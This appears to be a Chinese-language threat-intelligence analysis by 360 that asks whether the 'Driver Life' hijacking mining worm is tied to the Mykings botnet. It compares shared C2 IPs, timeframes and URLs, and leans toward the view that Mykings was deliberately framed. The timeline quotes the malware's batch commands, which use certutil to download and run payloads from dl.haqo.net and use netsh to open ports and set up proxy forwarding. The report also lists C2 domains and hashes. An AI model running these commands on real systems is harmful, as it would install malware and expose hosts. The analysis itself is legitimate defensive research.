「驅動人生」劫持事件與Mykings家族活動的關聯分析

背景

近期360威脅情報中心發現劫持「驅動人生」的挖礦蠕蟲再次活躍並做出了預警（詳情可以參見《劫持「驅動人生」的挖礦蠕蟲再次活躍》一文），在分析團夥的新活動時360威脅情報中心發現了一些涉及到Mykings家族活動的現象，但未能得出確定性的結論，在此分享出來供業界參考，希望能補充更多維度的信息共同研判。

網絡基礎設施的重疊

在對「驅動人生」劫持事件下載木馬的域名dl.haqo.net進行關聯分析時，我們注意到其中一個子域名js.haqo.net，在360威脅情報中心的ALPHA平臺中被打上Mykings的標籤，該域名解析到IP 81.177.135.35 。

 

查看81.177.135.35的信息，發現該IP在2018年-2019年的時間段基本上是被Mykings家族所使用，下圖可以看到此IP綁定的域名幾乎全是Mykings使用的C&C，域名格式為js.xxx.xxx，與Mykings的一些子域名格式一致，並且一直到2019年1月24日Mykings的眾多域名依然解析到此IP上。而在2019年1月09日，攻擊驅動人生的幕後團夥所使用的域名js.haqo.net也解析到了這個IP。

為了進一步發現更多的關聯，使用ALPHA平臺的威脅關聯分析功能，可以清晰地看到haqo.net下面的三個子域名與Mykings的部分域名之間的關係：

 

在對兩個事件涉及到的C&C域名進行關聯分析時，除了觀察域名是否解析到相同的IP，還需要確認使用同一個IP的時間段是否一致，如果時間段有重疊，共用基礎設施的可能性加大。我們整理了攻擊驅動人生的團夥與Mykings使用上面提到的三個IP的時間段，如下表所示，可以發現兩者使用同一IP的時間段是有所重疊的，顯示出更強的關聯度。

域名

IP

First_Seen

Last_Seen

「驅動人生」挖礦蠕蟲

js.haqo.net

81.177.135.35

2018/12/25

2019/1/28

Mykings

js.mys2016.info

81.177.135.35

2018/5/29

2019/1/27

Mykings

js.mykings.pw

81.177.135.35

2018/5/25

2019/1/22

「驅動人生」挖礦蠕蟲

ups.haqo.net

66.117.6.174

2018/12/21

2018/12/21

「驅動人生」挖礦蠕蟲

v.haqo.net

66.117.6.174

2019/1/7

2019/1/9

Mykings

down.mys2018.xyz

66.117.6.174

2018/12/12

2018/12/12

Mykings

down.1226bye.pw

66.117.6.174

2018/12/27

2019/1/22

「驅動人生」挖礦蠕蟲

ups.haqo.net

223.25.247.152

2018/12/21

2019/1/28

Mykings

www.cyg2016.xyz

223.25.247.152

2018/1/28

2019/1/22

Mykings

down.mys2016.info

223.25.247.152

2018/1/26

2018/2/4

 

我們不僅看到了域名解析到IP的重疊情況，還注意到了兩個事件相似的HTTP請求：js.haqo.net在2018-12-25首次解析到IP 81.177.135.35上，接著有樣本請求了hxxp://js.haqo.net:280/v.sct；2018-12-26日，Mykings的js.mys2016.info也解析都該IP上，有樣本請求了hxxp://js.mys2016.info:280/v.sct。看起來兩個事件的不同域名同一個時間段解析到同一個IP上，並且使用了同一個埠280，連URL的Path都一樣: /v.sct 。

Mykings訪問hxxp://js.mys2016.info:280/v.sct這個URL的樣本如下：

可疑的關聯性

基於以上的網絡基礎設施的重疊和訪問請求的相似性，我們是否就可以得到「驅動人生」劫持事件與Mykings背後的團夥是同一個呢？我們的觀點是：不一定。

Mykings會配合雲端機制發起掃描然後嘗試掃描和入侵，因此被捕獲的樣本量相當多; 驅動人生事件的永恆之藍挖礦蠕蟲也會主動進行傳播，被捕獲的樣本量也不少。但是，hxxp://js.haqo.net:280/v.sct這個連結指向文件無法下載，2018-12-25日VT上首次出現這個URL時，甚至連TCP連接都沒能建立起來，網絡上也並沒有留存任何請求了這個URL的樣本或者URL的相應數據。

而VT對於URL的檢測是不可靠的（特別是沒有獲取到相應數據的時候），任何人都可以構造一個完全不存在URL提交檢測，這樣在搜索對應的域名/IP時，URL或者Downloaded Files將會顯示出被構造的URL。

例如隨意輸入hxxp://js[.]haqo.net:6252/admin.asp，儘管請求沒成功什麼數據也沒有返回，依然有三個引擎產生了告警。而再次搜索js.haqo.net時，關聯URL中已然多了一條: hxxp://js[.]haqo.net:6252/admin.asp

所以儘管看似「驅動人生」劫持木馬的幕後團夥跟Mykings有千絲萬縷的關係，但是並沒有一個確切的能夠提供實錘的證據表明他們是同一個團夥或者兩個團夥有交流溝通：儘管一些沒有被使用的子域名解析到了Mykings掌握的IP上，而且使用的時間段有所重合；兩個團夥已知的惡意代碼沒有太多的相似之處；VT上js.haqo.net的某個URL構造得與Mykings相關性非常強，但卻沒有實際返回的數據可以用來確認「驅動人生」劫持木馬利用到了Mykings的IP對應的伺服器資源。

時間線

目前360對於「驅動人生」劫持木馬事件做了一系列的分析，在這裡簡單總結一下「驅動人生」時間的時間線：

2018年12月14日

驅動人生攻擊爆發，內網傳播用的永恆之藍漏洞，下載的payload地址：http://dl.haqo.net/dl.exe

   當時的永恆之藍的攻擊模塊的BAT內容如下：

cmd.exe /c certutil -urlcache -split -fhttp://dl.haqo.net/dl.exec:/install.exe&c:/install.exe&netshfirewall add portopening tcp 65531 DNS&netsh interface portproxy add v4tov4listenport=65531 connectaddress=1.1.1.1 connectport=53

   而從該地址下載的dl.exe（f79cb9d2893b254cc75dfb7f3e454a69）的C2地址為：

  

2018年12月16日

各大安全廠商曝光該攻擊，攻擊逐步停止。

2018年12月27日

永恆之藍攻擊模塊攻擊成功後在目標機器上運行的bat的內容變更下一階段的payload地址

從http://dl.haqo.net/dl.exe改成了http://dl.haqo.net/dll.exe；

     certutil-urlcache -split -f http://dl.haqo.net/dll.exec:\installs.exe

netshinterface portproxy add v4tov4 listenport=65532 connectaddress=1.1.1.1connectport=53

netshfirewall add portopening tcp 65532 DNS2

c:\windows\temp\cm.exe/c c:\installs.exe

taskkill/F /IM cmd.exe

而該地址下載回來的樣本（f9144118127ff29d4a49a30b242ceb55）的C2地址為以下3個，增加了http://img.minicen.ga/i.png，而該域名為免費域名，註冊地址為：freenom.com

2019年1月23日

http://dl.haqo.net/dll.exe的地址的樣本變為：

59b18d6146a2aa066f661599c496090d，下圖為該樣本的傳播量：

   該樣本的C2地址變為下圖的3個域名，增加了o.beahh.com：

   其中 beahh.com域名是2019年1月16日剛註冊的。

總結

         360威脅情報中心基於自有的大數據和威脅情報平臺對入侵驅動人生的幕後團夥進行了關聯分析，發現其所用的IP與Mykings事件團夥的部分IP重合，並且使用時間的段重合，甚至連樣本所訪問的URL格式、埠都一樣。但是兩個團夥已知的惡意代碼沒有太多的相似之處，格式高度一致的URL沒有實際上的請求和響應數據，由於VT不可靠的URL檢測機制，該URL是否實際存在也是個疑問。

基於看到的事實，有兩個猜想值得關注：1、入侵「驅動人生」的幕後黑手與Mykings事件團夥存在聯繫，甚至可能是同一個團夥。2、「驅動人生」木馬的團夥在有意識地積極栽贓嫁禍給Mykings團夥。我們的觀點傾向於後者，360威脅情報中心會持續保持跟蹤，基於新發現的事實調整自己的看法，也希望安全業界分享自己的發現。

 

參考

360對劫持「驅動人生」的挖礦蠕蟲分析報告系列詳情如下表：

分析文章標題

發布日期

分析團隊

《利用「驅動人生」升級程序的惡意程序預警》

2018.12.15

360網際網路安全中心

《驅動人生旗下應用分發惡意代碼事件分析 - 一個供應鏈攻擊的案例》

2018.12.17

360威脅情報中心

《警報！「永恆之藍」下載器木馬再度更新！》

2018.12.19

360安全衛士

《劫持「驅動人生」的挖礦蠕蟲再次活躍》

2019.01.24

360威脅情報中心

《MyKings: 一個大規模多重殭屍網絡》

2018.01.24

360網絡安全研究院

https://cert.360.cn/warning/detail?id=57cc079bc4686dd09981bf034130f1c9

https://ti.360.net/blog/articles/an-attack-of-supply-chain-by-qudongrensheng/

https://weibo.com/ttarticle/p/show?id=2309404318990783612243

https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247486576&idx=1&sn=dc5ff6a05fac06608365823173d17dae&chksm=ea65fb07dd1272113e4890dd284d19e945b4e0ae803f75671ee46cb3fbd42c54fa9170caac86&scene=0&xtrack=1#rd

https://blog.netlab.360.com/mykings-the-botnet-behind-multiple-active-spreading-botnets/